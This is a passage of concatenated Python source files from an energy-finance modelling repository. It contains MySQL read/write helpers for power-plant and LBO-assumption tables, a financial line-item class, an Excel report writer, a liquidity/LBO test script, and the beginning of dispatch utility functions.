    """Load every financials_lbo row keyed by (portfolio, scenario, version)
    and return it as a pandas DataFrame."""
    query = """
    SELECT * FROM financials_lbo
    where
    portfolio = %s
    and
    scenario = %s
    and
    version = %s;
    """
    conn = config_connection(HOST, USER, PASSWORD, DATABASE)
    result_df = pd.read_sql(query, conn, params=[portfolio, scenario, version])
    conn.close()
    return result_df
def put_powerplants(ready_to_kean_pp_df, portfolio=None, overwrite_option=False):
    """Append powerplant rows to the powerplant table.

    When both *portfolio* and *overwrite_option* are given, the plants
    belonging to that portfolio are deleted first.

    Bug fix: the original opened a DB connection unconditionally but closed it
    only on the overwrite path, leaking a connection otherwise. Debug prints
    were also removed.
    """
    if portfolio is not None and overwrite_option:
        connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
        try:
            sql_statement = " delete from powerplant where name in (select distinct entity_name from portfolio where name = %s and entity_type = 'plant');"
            cursor = connection_instance.cursor()
            cursor.execute(sql_statement, params=[portfolio])
            connection_instance.commit()
        finally:
            connection_instance.close()
    engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
    engine = create_engine(engine_str, encoding='latin1', echo=True)
    ready_to_kean_pp_df.to_sql(name='powerplant', con=engine, if_exists='append', index=False)
def put_powerplant(ready_to_kean_pp_df, id_powerplant=[]):
    """Append powerplant rows, optionally replacing specific primary keys.

    When *id_powerplant* is a non-empty list, those rows are deleted first.
    The mutable default is kept for interface compatibility; the list is
    never mutated here.

    Bug fixes: ids are now bound as query parameters (the original joined raw
    id strings straight into the SQL text, which is injection-prone), and the
    connection is only opened when needed and always closed (the original
    opened it unconditionally but closed it only on the delete path).
    """
    engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
    engine = create_engine(engine_str, encoding='latin1', echo=True)
    if id_powerplant:
        connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
        try:
            placeholders = ", ".join(["%s"] * len(id_powerplant))
            sql_statement = "delete from powerplant where id_powerplant in (" + placeholders + ");"
            cursor = connection_instance.cursor()
            cursor.execute(sql_statement, list(id_powerplant))
            connection_instance.commit()
        finally:
            connection_instance.close()
    ready_to_kean_pp_df.to_sql(name='powerplant', con=engine, if_exists='append', index=False)
def put_technology(ready_to_kean_tech_df):
    """Replace the entire technology table with *ready_to_kean_tech_df*:
    wipe it, then bulk-append the new rows."""
    wipe_sql = """
    DELETE FROM technology;
    """
    conn = config_connection(HOST, USER, PASSWORD, DATABASE)
    cur = conn.cursor()
    cur.execute(wipe_sql)
    conn.commit()
    conn.close()
    engine = create_engine(
        'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE,
        encoding='latin1', echo=True)
    ready_to_kean_tech_df.to_sql(name='technology', con=engine, if_exists='append', index=False)
def get_powerplants(effective_date=None):
    """Return all powerplant rows effective on *effective_date* (default: today).

    Bug fix: the default was previously `datetime.now().date()` evaluated once
    at import time, so long-running processes kept querying with a stale date.
    """
    if effective_date is None:
        effective_date = datetime.now().date()
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    sql_statement = """
    SELECT * FROM powerplant WHERE effective_start <= %s and effective_end >= %s;
    """
    powerplants_df = pd.read_sql(sql_statement, connection_instance, params=[effective_date, effective_date])
    connection_instance.close()
    return powerplants_df
def get_powerplants_by_portfolio(portfolio, effective_date=None):
    """Return the powerplant rows belonging to *portfolio* that are effective
    on *effective_date* (default: today).

    Bug fix: the default date was previously evaluated once at import time.
    """
    if effective_date is None:
        effective_date = datetime.now().date()
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    sql_statement = """
    SELECT * FROM powerplant WHERE effective_start <= %s and effective_end >= %s and name in (select distinct entity_name from portfolio where name = %s and entity_type='plant');
    """
    powerplants_df = pd.read_sql(sql_statement, connection_instance, params=[effective_date, effective_date, portfolio])
    connection_instance.close()
    return powerplants_df
def get_powerplant(name, fuel_type, market, node, power_hub, effective_date=None):
    """Return the powerplant rows matching the full identity key
    (name, fuel_type, market, node, power_hub) effective on *effective_date*
    (default: today).

    Bug fix: the default date was previously evaluated once at import time.
    """
    if effective_date is None:
        effective_date = datetime.now().date()
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    sql_statement = """
    SELECT * FROM powerplant
    where name = %s
    and fuel_type = %s
    and market = %s
    and node = %s
    and power_hub = %s
    and effective_start <= %s
    and effective_end >= %s
    ;
    """
    powerplant_df = pd.read_sql(sql_statement, connection_instance, params=[name, fuel_type, market, node, power_hub, effective_date, effective_date])
    connection_instance.close()
    return powerplant_df
def get_technology(project):
    """Fetch the technology rows for a single *project* as a DataFrame."""
    query = """
    SELECT * FROM technology where project = %s;
    """
    conn = config_connection(HOST, USER, PASSWORD, DATABASE)
    tech_df = pd.read_sql(query, conn, params=[project])
    conn.close()
    return tech_df
def get_portfolio_with_powerplant(portfolio_name):
    """Return one row per plant in *portfolio_name*, joined with that plant's
    currently-effective powerplant characteristics.

    Note: although the join is a LEFT JOIN, the outer WHERE clause filters on
    b.effective_start/effective_end, so plants with no currently-effective
    powerplant record are dropped from the result.
    """
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    # portfolio rows supply the membership (entity_type='plant'); powerplant
    # rows supply the technical attributes (capacities, hubs, outage windows,
    # ownership, ...), restricted to records effective as of CURDATE().
    sql_statement = """ select
    a.name as portfolio_name,
    a.entity_name as powerplant_name,
    b.technology as technology_name,
    b.fuel_type as fuel_type,
    b.market as market,
    b.power_hub as power_hub,
    b.power_zone as power_zone,
    b.power_hub_on_peak as power_hub_on_peak,
    b.power_hub_off_peak as power_hub_off_peak,
    b.node as node,
    b.fuel_zone as fuel_zone,
    b.fuel_hub as fuel_hub,
    b.summer_fuel_basis as summer_fuel_basis,
    b.winter_fuel_basis as winter_fuel_basis,
    b.summer_duct_capacity as summer_duct_capacity,
    b.summer_base_capacity as summer_base_capacity,
    b.winter_duct_capacity as winter_duct_capacity,
    b.winter_base_capacity as winter_base_capacity,
    b.first_plan_outage_start as first_plan_outage_start,
    b.first_plan_outage_end as first_plan_outage_end,
    b.second_plan_outage_start as second_plan_outage_start,
    b.second_plan_outage_end as second_plan_outage_end,
    b.carbon_cost as carbon_cost,
    b.source_notes as source_notes,
    b.retirement_date as retirement_date,
    b.ownership as ownership
    from
    (select * from portfolio where name = %s and entity_type='plant' ) as a
    left join
    (select * from powerplant ) as b
    on a.entity_name = b.name
    where b.effective_start <= CURDATE() and b.effective_end >= CURDATE(); """
    portfolio_with_powerplant_df = pd.read_sql(sql_statement, connection_instance, params=[portfolio_name])
    connection_instance.close()
    return portfolio_with_powerplant_df
def put_lbo_assumptions(ready_to_kean_lbo_assumptions_df, portfolio, scenario, version, overwrite_option=False):
    """Append LBO assumption rows to lbo_assumptions.

    When overwrite_option is True, existing rows for the same
    (portfolio, scenario, version) key are deleted first. Inserts are chunked
    at 3000 rows, mirroring put_financials_lbo.
    """
    if overwrite_option:
        connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
        try:
            # Parameterized delete: the original concatenated user values into
            # the SQL text (injection-prone, quote-fragile).
            delete_sql_statment = """
            DELETE FROM lbo_assumptions
            where portfolio = %s and scenario = %s and version = %s;
            """
            cursor = connection_instance.cursor()
            cursor.execute(delete_sql_statment, (portfolio, scenario, version))
            connection_instance.commit()
        finally:
            connection_instance.close()
    engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
    engine = create_engine(engine_str, encoding='latin1', echo=True)
    index = 0
    step = 3000
    while index + step < len(ready_to_kean_lbo_assumptions_df):
        ready_to_kean_lbo_assumptions_df.iloc[index:index + step].to_sql(name='lbo_assumptions', con=engine, if_exists='append', index=False)
        index += step
    # Flush the final (possibly partial) chunk.
    ready_to_kean_lbo_assumptions_df.iloc[index:].to_sql(name='lbo_assumptions', con=engine, if_exists='append', index=False)
def get_lbo_assumptions(portfolio, scenario, version):
    """Return the lbo_assumptions rows for one (portfolio, scenario, version)
    key as a pandas DataFrame."""
    query = """
    SELECT * FROM lbo_assumptions
    where
    portfolio = %s
    and
    scenario = %s
    and
    version = %s;
    """
    conn = config_connection(HOST, USER, PASSWORD, DATABASE)
    assumptions_df = pd.read_sql(query, conn, params=[portfolio, scenario, version])
    conn.close()
    return assumptions_df
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,748 | changliukean/KEAN3 | refs/heads/master | /database/dbPCUC.py | import mysql.connector
from database.dbGeneral import HOST,USER,PASSWORD,PROD_DATABASE,config_connection
from sqlalchemy import create_engine
import pandas as pd
from datetime import datetime
def put_characteristics(ready_to_kean_pcuc_df, scenario, version):
    """Replace the plant_characteristics rows for (scenario, version) and
    record the load in version_log.

    Rows are inserted in chunks of 3000 to keep statement sizes bounded.
    """
    connection_instance = config_connection(HOST, USER, PASSWORD, PROD_DATABASE)
    try:
        # Parameterized delete: the original concatenated scenario/version
        # into the SQL text, which is SQL-injection-prone.
        delete_sql_statment = """
        DELETE FROM plant_characteristics
        where scenario = %s and version = %s;
        """
        cursor = connection_instance.cursor()
        cursor.execute(delete_sql_statment, (scenario, version))
        connection_instance.commit()
    finally:
        # Release the connection even if the delete fails.
        connection_instance.close()
    engine_str = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + PROD_DATABASE
    engine = create_engine(engine_str, encoding='latin1', echo=True)
    step = 3000
    current_index = 0
    while current_index + step < len(ready_to_kean_pcuc_df):
        ready_to_kean_pcuc_df.iloc[current_index:current_index + step].to_sql(name='plant_characteristics', con=engine, if_exists='append', index=False)
        current_index += step
    ready_to_kean_pcuc_df.iloc[current_index:].to_sql(name='plant_characteristics', con=engine, if_exists='append', index=False)
    # NOTE(review): the audit user is hard-coded; consider making it a parameter.
    version_log_df = pd.DataFrame(
        columns=['timestamp', 'user', 'table_name', 'scenario', 'version', 'description', 'number_of_records_inserted'],
        data=[[datetime.now(), 'chang.liu@kindle-energy.com', 'plant_characteristics', scenario, version,
               'loaded from script as of ' + str(datetime.now()), len(ready_to_kean_pcuc_df)]])
    version_log_df.to_sql(name='version_log', con=engine, if_exists='append', index=False)
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,749 | changliukean/KEAN3 | refs/heads/master | /financial/FSLI.py |
class FSLI:
    """A single financial-statement line item (FSLI) over a reporting period.

    Attributes:
        name: line-item label.
        dateStart / dateEnd: the period the amount covers.
        amount: monetary value (default 0).
        creditSign: multiplier (typically +1/-1) applied when this item is
            rolled into a subtotal.
        isSubtotal: True when this FSLI is computed from other FSLIs.
    """

    def __init__(self, name, date_start, date_end, amount=0, credit_sign=1, is_subtotal=False):
        self.name = name
        self.dateStart = date_start
        self.dateEnd = date_end
        self.amount = amount
        self.creditSign = credit_sign
        self.isSubtotal = is_subtotal

    def __str__(self):
        """Return a multi-line, human-readable dump of the line item."""
        console_text = ''
        # Bug fix: the separator previously lacked a trailing newline, so it
        # ran straight into the "FSLI object:" header line.
        console_text += ("---------------------------\n")
        console_text += ("FSLI object:\n")
        console_text += ("Name:" + self.name + "\n")
        console_text += ("Date Start:" + str(self.dateStart) + "\n")
        console_text += ("Date End: " + str(self.dateEnd) + "\n")
        console_text += ("Amount: " + str(self.amount) + "\n")
        console_text += ("Credit Sign: " + str(self.creditSign) + "\n")
        console_text += ("Is Subtotal: " + str(self.isSubtotal) + "\n")
        return console_text

    def calc_subtotal(self, fslis):
        """Set self.amount to the credit-signed sum of *fslis*.

        No-op (with a console warning) when this FSLI is not flagged as a
        subtotal. Returns None in both cases.
        """
        if self.isSubtotal:
            self.amount = sum(fsli_obj.amount * fsli_obj.creditSign for fsli_obj in fslis)
        else:
            print("FSLI", self.name, " is not a subtotal FSLI.")
        return None
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,750 | changliukean/KEAN3 | refs/heads/master | /reportwriter/ReportWriter.py | import pyexcelerate
import sys
class ReportWriter:
    """Write a dict of 2-D data matrices into a pyexcelerate workbook,
    one worksheet per dict key, honouring optional per-sheet format hints
    (currently only 'RangeUpperLeft')."""

    def __init__(self,
                 workbook,
                 data,
                 formats):
        """
        Args:
            workbook: a workbook name string (a fresh pyexcelerate.Workbook is
                created) or an already-built pyexcelerate.Workbook.
            data: dict mapping sheet name -> rows (list of lists).
            formats: dict mapping sheet name -> format options.
        """
        self.workbook = self.__initialize_workbook(workbook)
        self.data = data
        self.formats = formats

    def __initialize_workbook(self, workbook):
        # Accept either a workbook name or an existing Workbook instance.
        if isinstance(workbook, str):
            return pyexcelerate.Workbook(workbook)
        if isinstance(workbook, pyexcelerate.Workbook):
            return workbook
        # Bug fix: previously fell through and returned None silently,
        # deferring the failure to a confusing AttributeError much later.
        raise TypeError("workbook must be a str or a pyexcelerate.Workbook")

    def get_lower_right_based_on_data(self, data_rows, range_upper_left):
        """Return the lower-right cell address (e.g. 'D3') of the rectangle
        anchored at *range_upper_left* that covers *data_rows*."""
        max_row = len(data_rows)
        max_row = int(''.join([char for char in range_upper_left if char.isdigit()])) + max_row - 1
        max_column = len(data_rows[0])
        max_column = self.get_col2num(''.join([char for char in range_upper_left if not char.isdigit()])) + max_column - 1
        max_column_letter = ReportWriter.get_num2col(max_column)
        return max_column_letter + str(max_row)

    def create_worksheet(self, sheet_name):
        """Create and return a new worksheet named *sheet_name*."""
        return self.workbook.new_sheet(sheet_name)

    def write_data_to_workbook(self):
        """Create one worksheet per key in self.data and write its matrix,
        anchored at the sheet's 'RangeUpperLeft' format hint (default 'A1')."""
        for key in self.data.keys():
            worksheet = self.workbook.new_sheet(key)
            data_rows = self.data[key]
            range_upper_left = 'A1'
            if key in self.formats:
                if 'RangeUpperLeft' in self.formats[key]:
                    range_upper_left = self.formats[key]['RangeUpperLeft']
            range_lower_right = self.get_lower_right_based_on_data(data_rows, range_upper_left)
            self.write_data_to_worksheet(worksheet, data_rows, range_upper_left, range_lower_right)

    def write_format_to_workbook(self, worksheet, format):
        """Apply formatting to *worksheet* (not implemented yet).

        Bug fix: the original definition omitted *self*, so calling this on an
        instance raised TypeError.
        """
        pass

    def write_data_to_worksheet(self, worksheet, data_rows, range_upper_left, range_lower_right):
        """Assign *data_rows* to the worksheet's cell range in one shot.
        (Debug prints from the original were removed.)"""
        worksheet.range(range_upper_left, range_lower_right).value = data_rows

    def save(self, filepath):
        """Persist the workbook to *filepath*."""
        self.workbook.save(filepath)

    @staticmethod
    def get_num2col(column_number):
        """Convert a 1-based column number to its letters (1 -> 'A', 27 -> 'AA')."""
        string = ""
        while column_number > 0:
            column_number, remainder = divmod(column_number - 1, 26)
            string = chr(65 + remainder) + string
        return string

    @staticmethod
    def get_col2num(column_letter):
        """Convert column letters ('A', 'AB', ...) to a 1-based number."""
        num = 0
        for c in column_letter:
            num = num * 26 + (ord(c.upper()) - ord('A')) + 1
        return num
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,751 | changliukean/KEAN3 | refs/heads/master | /liquidity_oob_test.py | from liquidity.Liquidity import OID, DFC, Liquidity, Debt, OperatingCompany
from datetime import date
import importlib
from reportwriter.ReportWriter import ReportWriter
from scipy.optimize import fsolve
import sys
def lightstone_test():
    """Smoke-test the Liquidity waterfall for the Lightstone portfolio and
    dump annual/monthly cash-flow summaries to an Excel workbook.

    Requires database connectivity for the scenario data; writes
    'myfirstkean3report.xlsx' into the working directory.
    """
    # --- earlier OID / DFC scratch experiments, kept for reference ---
    # balance = 1725000000
    # begin_date = date(2017,2,1)
    # end_date = date(2024,1,31)
    # oid_discount = 98
    #
    # monthly_oid_payments = OID.calc_monthly_oid_payments(balance, begin_date, end_date, oid_discount)
    #
    # print (monthly_oid_payments)
    #
    # balance = 300000000
    # begin_date = date(2018,9,1)
    # end_date = date(2024,1,31)
    # oid_discount = 99.5
    #
    # monthly_oid_payments = OID.calc_monthly_oid_payments(balance, begin_date, end_date, oid_discount)
    #
    # print (monthly_oid_payments)
    #
    # balance = 1725000000
    # begin_date = date(2017,2,1)
    # end_date = date(2024,1,31)
    # oid_discount = 98
    # initial_oid = OID(balance, begin_date, end_date, oid_discount)
    # monthly_oid_payments = initial_oid.build_monthly_oid_payments()
    #
    # print (monthly_oid_payments)
    #
    # balance = 300000000
    # begin_date = date(2018,9,1)
    # end_date = date(2024,1,31)
    # oid_discount = 99.5
    # upsize_oid = OID(balance, begin_date, end_date, oid_discount)
    # monthly_oid_payments = upsize_oid.build_monthly_oid_payments()
    # print (monthly_oid_payments)
    # balance = 1725000000
    # begin_date = date(2017,1,17)
    # end_date = date(2024,1,31)
    # dfc_rate = 0.04
    # initial_dfc = DFC(balance, begin_date, end_date, dfc_rate)
    # dfc_payments = initial_dfc.build_monthly_dfc_payments()
    #
    # print (dfc_payments)
    #
    # Scenario key identifying the liquidity inputs to load from the DB.
    portfolio = 'Lightstone'
    liquidity_scenario = '2020 Mar AMR Liquidity Test'
    liquidity_version = 'v1'
    lightstone_liquidity = Liquidity(portfolio,liquidity_scenario,liquidity_version)
    # --- capital-structure inspection scratch code, kept for reference ---
    # print (len(lightstone_liquidity.capitalStructure))
    # for item in lightstone_liquidity.capitalStructure:
    #     print ("==================================================")
    #     if isinstance(item, Debt):
    #         print (item.instrumentID)
    #         print (" --------------------- debt upsizes: ------------------- ")
    #         print (item.upsizes)
    #         print (" --------------------- debt prepays: ------------------- ")
    #         print (item.prepays)
    #     if isinstance(item, OperatingCompany):
    #         print (" --------------------- Operating Company: ------------------- ")
    #         print (item.portfolio)
    #         print (item.financialsScenario)
    #         print (item.financialsVersion)
    #         print (item.financialsTable)
    """ preset everything we need for running liquidity waterfall """
    lightstone_liquidity.set_cashflow_with_waterfall()
    """ build key components for liquidity """
    lightstone_liquidity.analyze_liquidity()
    financials_df = lightstone_liquidity.get_financials()
    annual_cashflow_datarows, monthly_cashflow_datarows = lightstone_liquidity.output_liquidity_results()
    # financials_df.to_csv("lightstone_financials_df.csv")
    """ Step 4, calling reportwrite to write the designed reports """
    # One sheet per summary; ReportWriter anchors each matrix at A1 by default.
    wb = 'myfirstkean3report.xlsx'
    filepath = 'myfirstkean3report.xlsx'
    data = {'Annual Summary':annual_cashflow_datarows, 'Monthly Summary': monthly_cashflow_datarows}
    formats = {}
    test_rw = ReportWriter(wb, data, formats)
    test_rw.write_data_to_workbook()
    test_rw.save(filepath)
if __name__ == '__main__':
    # Manual LBO test drive: loads the Vector 'LBO model test' scenario,
    # runs the leverage-buyout analysis, then solves for the purchase price
    # that hits a 20% IRR. Requires database connectivity.
    """ 20200527 test cases using vistra financials """
    portfolio = 'Vector'
    liquidity_scenario = 'LBO model test'
    liquidity_version = 'v1'
    vector_lbo = Liquidity(portfolio,liquidity_scenario,liquidity_version)
    """ preset everything we need for running liquidity waterfall """
    vector_lbo.set_cashflow_with_waterfall()
    """ build key component for lbo """
    vector_lbo.analyze_leverage_buyout()
    cashflow_df = vector_lbo.metadata['cashflow']
    # cashflow_df.to_csv("cashflow_df_1.csv")
    vector_lbo.solve_purchase_price_by_irr(0.2)
    cashflow_df = vector_lbo.metadata['cashflow']
    """ next step to use ReportWriter to write the formatted report """
    # NOTE: everything after sys.exit() is unreachable; the commented block
    # below is the previous Lightstone liquidity/report flow, kept for reference.
    sys.exit()
    #
    # """ build key components for liquidity """
    # lightstone_liquidity.analyze_liquidity()
    #
    # financials_df = lightstone_liquidity.get_financials()
    #
    # annual_cashflow_datarows, monthly_cashflow_datarows = lightstone_liquidity.output_liquidity_results()
    #
    # # financials_df.to_csv("lightstone_financials_df.csv")
    #
    # """ Step 4, calling reportwrite to write the designed reports """
    # wb = 'myfirstkean3report.xlsx'
    # filepath = 'myfirstkean3report.xlsx'
    # data = {'Annual Summary':annual_cashflow_datarows, 'Monthly Summary': monthly_cashflow_datarows}
    # formats = {}
    # test_rw = ReportWriter(wb, data, formats)
    # test_rw.write_data_to_workbook()
    # test_rw.save(filepath)
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,752 | changliukean/KEAN3 | refs/heads/master | /utility/dispatchUtils.py | import pandas as pd
import numpy as np
from utility.dateUtils import get_month_list
from database.dbPrices import get_historical_lmp
from dateutil.relativedelta import relativedelta
from datetime import date, datetime
import sys
def get_hr(row, heatrate_summer, heatrate_winter):
    """Return the seasonal heat rate for the row's period, scaled by 1/1000
    (Btu/kWh -> MMBtu/MWh). May through September counts as summer; every
    other month uses the winter rate."""
    month = row['period'].month
    seasonal_rate = heatrate_summer if 5 <= month <= 9 else heatrate_winter
    return seasonal_rate / 1000.0
def get_load(row, load_summer, load_winter):
    """Return the seasonal value for the row's period: the summer figure for
    May through September, the winter figure otherwise."""
    month = row['period'].month
    return load_summer if 5 <= month <= 9 else load_winter
def get_outage_days(row, outage_start_date, outage_end_date):
    """Return the number of planned-outage days that fall inside the row's month.

    Args:
        row: mapping with a 'period' date — assumed to be the month-END date,
            since period.day is treated as the month length (TODO confirm).
        outage_start_date, outage_end_date: outage window; may be NaN/None.
            Only month and day are used — both dates are re-anchored to the
            period's year, so a window that wraps a year boundary (e.g. Dec->Jan)
            is not handled correctly here (pre-existing limitation).

    Returns:
        Inclusive day count of the overlap between the outage window and the
        month, or 0 when there is no overlap or no outage is defined.

    Fixes vs. previous version:
        - the "outage entirely inside the month" case fell through and
          returned None;
        - when the outage began before the month, days were counted from the
          outage start instead of the month start, over-counting.
    """
    period = row['period']
    period_start = date(period.year, period.month, 1)
